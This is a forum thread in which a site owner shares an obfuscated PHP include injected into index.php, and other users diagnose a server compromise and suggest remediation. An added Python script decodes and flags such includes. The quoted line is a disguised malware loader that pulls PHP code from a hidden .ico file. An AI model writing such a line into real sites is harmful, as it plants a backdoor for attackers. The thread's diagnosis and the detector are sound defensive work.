buster808 Posted June 18, 2019
Hi, Today both my live websites that are identical in build had their index.php changed to the example below. One of them also had lots of images deleted from asset/files deleted from folders. Has anyone ever had an issue like this before? Or any ideas of what this could be, as I don't want to go through this again. Thanks
<?php /*dc5b4*/ @include "\057home\057xtra\143rea/\160ubli\143_htm\154/lee\163tint\163.co.\165k/wi\162e/mo\144ules\057Syst\145m/.d\1429f76\0664.ic\157"; /*dc5b4*/
louisstephens Posted June 18, 2019
From what I can tell, someone might have gained access to your server/account. I have seen this before with WordPress sites. Has anything with your server changed lately? Also, I would check with your host to check if this is not just affecting you. Just in the short term, I would change your FTP credentials.
teppo Posted June 18, 2019
That's quite strange. Running this through a decoder suggests that this include is trying to load a file from /wire/modules/System/.db9f7664.ico. Is this a path that exists on your site, and if so, what's in that file? /wire/modules/System/ is a path where SystemUpdater and SystemNotifications live, but I'm not aware of anything that should create a file like that.
Combined with files suddenly being removed and this file getting modified, it doesn't sound good. The first thing to do would be to check the server, i.e. is it possible that someone has gained illegitimate access to it. Is this a shared host, a VPS, or something else entirely? Were both sites on the same host?
I'm not aware of any security issues with ProcessWire itself, but ProcessWire isn't immune to problems caused by someone gaining access to the server, directly or through another application (such as a WordPress installation – which has actually happened before).
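The decoding step teppo describes, written out as a small detection script. This is an added example, not code from the thread or from ProcessWire: it decodes PHP octal/hex string escapes in include/require statements and flags targets that are escaped, hidden, or not PHP files. The function names, reason labels, allowed extensions, and the benign sample line are assumptions made for illustration.

```python
import re
from pathlib import PurePosixPath

# include/require with a double-quoted literal argument (optional @ and paren)
INCLUDE_RE = re.compile(
    r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.I)
# PHP double-quoted escapes: \NNN octal (1-3 digits), \xHH hex (1-2 digits)
ESCAPE_RE = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})')


def decode_php_escapes(literal):
    """Decode octal and hex escapes as PHP does inside double quotes."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)  # PHP wraps values > 0377
        return chr(int(m.group(2), 16))
    return ESCAPE_RE.sub(repl, literal)


def scan_php_source(source):
    """Return (decoded_path, reasons) for every suspicious include found."""
    findings = []
    for m in INCLUDE_RE.finditer(source):
        raw = m.group(1)
        path = decode_php_escapes(raw)
        name = PurePosixPath(path).name
        reasons = []
        if ESCAPE_RE.search(raw):
            reasons.append("escaped-path")       # path hidden behind escapes
        if name.startswith("."):
            reasons.append("hidden-file")        # dotfile as include target
        if not name.lower().endswith((".php", ".inc")):
            reasons.append("non-php-extension")  # e.g. .ico holding PHP code
        if reasons:
            findings.append((path, reasons))
    return findings


# The injected line quoted in the first post of this thread.
INJECTED = r'''<?php /*dc5b4*/ @include "\057home\057xtra\143rea/\160ubli\143_htm\154/lee\163tint\163.co.\165k/wi\162e/mo\144ules\057Syst\145m/.d\1429f76\0664.ic\157"; /*dc5b4*/'''
# Constructed benign include, for contrast.
BENIGN = '<?php require_once "./wire/core/ProcessWire.php";'

if __name__ == "__main__":
    for label, src in (("injected", INJECTED), ("benign", BENIGN)):
        print(label, scan_php_source(src))
```

Running `scan_php_source` over every `.php` file under each site root on the account shows which other entry points carry the same kind of include.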
buster808 Posted June 18, 2019 (Author)
Hi, db9f7664.ico does not exist. I have changed FTP details and will send an email to host. Both sites are on a shared host and does have WordPress websites on there.
louisstephens Posted June 18, 2019
2 minutes ago, buster808 said: "Both sites are on a shared host and does have Wordpress websites on there."
Since you do have WordPress installs on the server, it wouldn't hurt to log in and check/update any passwords, make sure WordPress is updated (could help with any vulnerabilities with bug fixes etc), and make sure that all themes and plugins are up to date as well.
buster808 Posted June 18, 2019 (Author)
Thanks Louis, Teppo. I've just gone through and done this. WordPress still haunting me ha
wbmnfktr Posted June 18, 2019
There are a few things that came up in my mind right now. First I thought it looked like a failed git/SVN merge of some kind but afterwards it looked like a failed upload from FileZilla. At least they both look pretty similar somehow.
As you stated that there are more instances of other sites and CMSs on that hosting you might want to try to set up different users for different sites. I guess you are using a US hosting company such as DreamH*st, H*stgator or Blueh*st, *2, or another 3.99/month mass-hosting ... I had several similar issues with these companies in the past - but to their rescue - they offer different users on an account to separate installations/instances of different sites.
TL;DR: what @teppo and @louisstephens say seems to be the case... someone got somehow access to that hosting. Maybe even through a nifty trick in W*rdPress.
buster808 Posted June 18, 2019 (Author)
I have been away for a couple of days and FileZilla was open and logged in with my laptop on sleep. I need to be more careful.
wbmnfktr Posted June 18, 2019
That's far from the best and ideal solution to go on vacation but did you change something within the path that @teppo mentioned? Even if so... the index.php is still somewhere else than that path. It's either weird or a good moment to change and set up a better and more secure environment.
buster808 Posted June 18, 2019 (Author)
Most certainly a good moment to create a more secure environment. Thanks